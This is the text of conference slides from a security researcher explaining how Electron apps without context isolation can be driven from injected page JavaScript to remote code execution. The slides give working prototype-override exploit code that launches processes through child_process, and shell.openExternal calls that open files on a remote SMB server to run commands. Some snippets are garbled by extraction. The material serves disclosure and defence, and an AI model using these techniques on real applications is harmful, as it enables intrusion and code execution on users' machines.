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Masato Kinugawa CureCon 08/2018

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About me • Masato Kinugawa (@kinugawamasato) • I live in Japan • I Joined Cure53 in 01/2016 • I like web, browser, JavaScript and XSS

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Introduction • In 2016, we audited one Electron based application • Found RCE, ... but noticed the root cause was in Electron itself • Reported to Electron Team and it was fixed by adding the option called "contextIsolation" • I'd like to talk about it!

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Outline 1. Basics of Electron 2. Details of Context Isolation 3. Abusing the lack of Context Isolation

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Basics of Electron 1

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Electron? • Framework for creating desktop applications with HTML, CSS and JavaScript • Developed by GitHub

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Basics: Process • Electron has two process types • Main Process • Renderer Process

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Can create Renderer Process Basics: Main Process main.js const {BrowserWindow} = require('electron'); let win = new BrowserWindow(); //Open Renderer Process win.loadURL(`file://${__dirname}/index.html`);

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Basics: Renderer Process It's a browser window index.html TEST

Hello Electron!

body{ background:url('island.png') }

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Basics: webPreferences • Settings of renderer process's features • Set it in main process, like this: new BrowserWindow({ webPreferences:{ "FEATURE_NAME": true } });

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Basics: webPreferences • Important 3 features in this talk • nodeIntegration • preload • contextIsolation

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Basics: nodeIntegration Decide if Node APIs are enabled in renderer let win = new BrowserWindow({ webPreferences:{ nodeIntegration: true } }); win.loadURL(`[...] index.html`); main.js require('child_process') .exec('calc') index.html This means: nodeIntegration + XSS in renderer = RCE

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Basics: Preload Script • Loaded before other scripts in the renderer are loaded • Has unlimited access to Node APIs new BrowserWindow({ webPreferences:{ nodeIntegration: false, preload: path.join(__dirname,'preload.js') } }); main.js

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Basics: Preload Script /* preload.js */ typeof require === 'function';//true window.runCalc = function(){ require('child_process').exec('calc') }; typeof require === 'undefined';//true runCalc(); ➡Can export necessary node-features to pages Renderer Process

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Are these settings RCE-safe enough? • nodeIntegration : false • Necessary features are exported via preload • Also assume that the argument is properly validated to prevent RCE ➡No RCE even if XSS exists?

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Still not safe enough Developers should use "contextIsolation" option also! new BrowserWindow({ webPreferences:{ nodeIntegration: false, contextIsolation: true, preload: path.join(__dirname,'preload.js') } }); What is that? ➡

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Details of Context Isolation 2

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contextIsolation • Added in v1.4.15 (Released on Jan 20, 2017) • The default is false • Official doc still says it's an experimental feature but we really need it to remove the possibility of RCE

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contextIsolation's effect • Separates JavaScript context between the page's scripts and preload scripts • Separetes JavaScript context between the page's scripts and Electron's internal code

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contextIsolation Electron uses the same technology as Chromium's Content Scripts to enable this behavior. s/tutorial/ “ Let's compare the behavior! ➡

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WebExtension's content scripts /* Content Script */ = 123; /* */ alert( Isolated World

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Electron's preload scripts(default) /* preload.js */ = 123; /* index.html */ alert( No Isolated World

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Electron(contextIsolation:true) /* preload.js */ = 123; /* index.html */ alert( Isolated World

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Communicate under contextIsolation:true /* preload.js */ onmessage=function(e){ if('runCalc'){ require('child_process').exec('calc') } } /* index.html */ postMessage('runCalc','*') Isolated World Use postMessage, like WebExtension's content script

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Let's see... and? • The lack of isolated world is useful for developers, no? • because we can communicate directly... But it is useful for attackers also?! ➡

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Abusing the lack of Context Isolation 3

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Basic idea to RCE An Attacker can: 1. Execute arbitrary JavaScript in renderer somehow(e.g. XSS or navigation to external sites) 2. Overwrite the built-in method which is used in preload or Electron internal code to own function 3. Trigger the use of overwritten function 4. Something happens => Achieve RCE

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Attack Examples #1: Attacking preload scripts #2: Attacking Electron internal code

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#1: Attacking preload scripts /* preload.js */ const {shell} = require('electron'); const SAFE_PROTOCOLS = ["http:", "https:"]; document.addEventListener('click', (e) => { if ( === 'A') { var link =; if (SAFE_PROTOCOLS.indexOf(link.protocol) !== -1) { shell.openExternal(link.href); } else { alert('This link is not allowed'); } e.preventDefault(); } }, false); This code opens only http(s): links with default browser

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shell.openExternal ? Opens the given URL using the desktop's default way const {shell} = require('electron'); /* Open with default browser */ shell.openExternal(''); /* Open with default mail client */ shell.openExternal(''); /* Execute exe file */ shell.openExternal('file:///C:/windows/system32/calc.exe');

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#1: Attacking preload scripts /* preload.js */ const {shell} = require('electron'); const SAFE_PROTOCOLS = ["http:", "https:"]; document.addEventListener('click', (e) => { if ( === 'A') { var link =; if (SAFE_PROTOCOLS.indexOf(link.protocol) !== -1) { shell.openExternal(link.href); } else { alert('This link is not allowed'); } e.preventDefault(); } }, false); We want to pass arbitrary URL to shell.openExternal Let's overwrite this!

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#1: Attacking preload scripts Array.prototype.indexOf = function(){ return 1337; } An attacker injects this JavaScript code:

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#1: Attacking preload scripts if (SAFE_PROTOCOLS.indexOf(link.protocol) !== -1) { shell.openExternal(link.href); } Now this code has ...

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#1: Attacking preload scripts if (1337 !== -1) { shell.openExternal(link.href); } the same meaning as the following code!

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#1: Attacking preload scripts Array.prototype.indexOf=function(){ return 1337; } CLICK Click Now all links are opened by shell.openExternal if (1337 !== -1) { shell.openExternal(link.href); }

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BTW: Is shell.openExternal really exploitable? • To abuse this, the malicious program is placed in a known path • We can't pass any arguments Do we have any ways? ➡

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How about file server? const { shell } = require('electron'); shell.openExternal("file://[REMOTE_SMB_SERVER]/share/test.exe"); Shows warning dialog. Hmm...

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File server + .SettingContent-ms file const { shell } = require('electron'); shell.openExternal("file://[REMOTE_SMB_SERVER]/share/test.SettingContent-ms"); • Matt Nelson found that ".SettingContent-ms" file can run shell command without warning dialog The Tale of SettingContent-ms Files – Posts By SpecterOps Team Members(Matt Nelson) Works!

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Other tricks • File server + .jar file (Java needed) • Java does not respect ADS • File server + mscorsvw.exe (Found by Alex Inführ) InsertScript: DLL Hijacking via URL files (Alex Inführ) url-files.html

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#2: Attacking Electron internal code • A part of the Electron itself is implemented by using Node.js code • The overwritten built-in method is used here as well • By triggering the use of overwritten method in internal code, can get access to node APIs from the argument

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#2: Attacking Electron internal code // Clean cache on quit. process.on('exit', function () { for (let p in cachedArchives) { if (!, p)) continue cachedArchives[p].destroy() } }) 3ba4c5/lib/common/asar.js#L30-L36 "exit" event listener is always set by the internal code when the page loading is started. This event is emitted just before navigation

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#2: Attacking Electron internal code EventEmitter.prototype.emit = function emit(type) { [...] handler = events[type]; [...] var isFn = typeof handler === 'function'; len = arguments.length; switch (len) { // fast cases case 1: emitNone(handler, isFn, this); break; case 2: [...] } }; if the "exit" event is emitted, EventEmitter.prototype.emit is called and it executes "emitNone" function Note: Here is inside require('events') bundled in Node.js

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#2: Attacking Electron internal code function emitNone(handler, isFn, self) { if (isFn); else { var len = handler.length; var listeners = arrayClone(handler, len); for (var i = 0; i < len; ++i) listeners[i].call(self); } } Then, it goes here

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#2: Attacking Electron internal code function emitNone(handler, isFn, self) { if (isFn); else { var len = handler.length; var listeners = arrayClone(handler, len); for (var i = 0; i < len; ++i) listeners[i].call(self); } } "self" is Node's process object

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#2: Attacking Electron internal code process.mainModule.require The process object has a reference to "require" function

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#2: Attacking Electron internal code function emitNone(handler, isFn, self) { if (isFn); else { var len = handler.length; var listeners = arrayClone(handler, len); for (var i = 0; i < len; ++i) listeners[i].call(self); } } So, let's overwrite this "call" and get access to process object

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#2: Attacking Electron internal code Overwrite, like this:{ process.mainModule.require('child_process').execSync('calc'); } location.reload();// Trigger the "exit" event

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#2: Attacking Electron internal code function emitNone(handler, isFn, self) { if (isFn); else { var len = handler.length; var listeners = arrayClone(handler, len); for (var i = 0; i < len; ++i) listeners[i].call(self); } }{ process.mainModule.require('child_process').execSync('calc'); } calc is launched via overwritten "call"!

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Attack Routes Attack route's examples: • XSS • Navigation to arbitrary remote sites • MitM Basically arbitrary JavaScript execution in the renderer + no "contextIsolation" mean game over.

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Attack Routes(2) • Drag & Drop • The window is a drop-zone by default, like general browsers

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Attack Routes(3-1) •Middle-click the links • Electron opens it in the new window by default

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Attack Routes(3-2) • Handling middle-click is often forgotten by app • "click" event is not emitted /* preload.js */ document.addEventListener('click', (e) => { /* It will not come here */ }, false);

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Conclusion • We should know RCE happens in default Electron even if "nodeIntegration" is not enabled • "contextIsolation" prevents RCE with overwritten built-in method. We have to use it explicitly because currently the default is false new BrowserWindow({ webPreferences:{ nodeIntegration: false, contextIsolation: true, preload: path.join(__dirname,'preload.js') } }); IMPORTANT!

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Thanks! • Thanks for reviewing, Mario Heiderich! • Thanks for the opportunity to give a presentation, Cure53 members!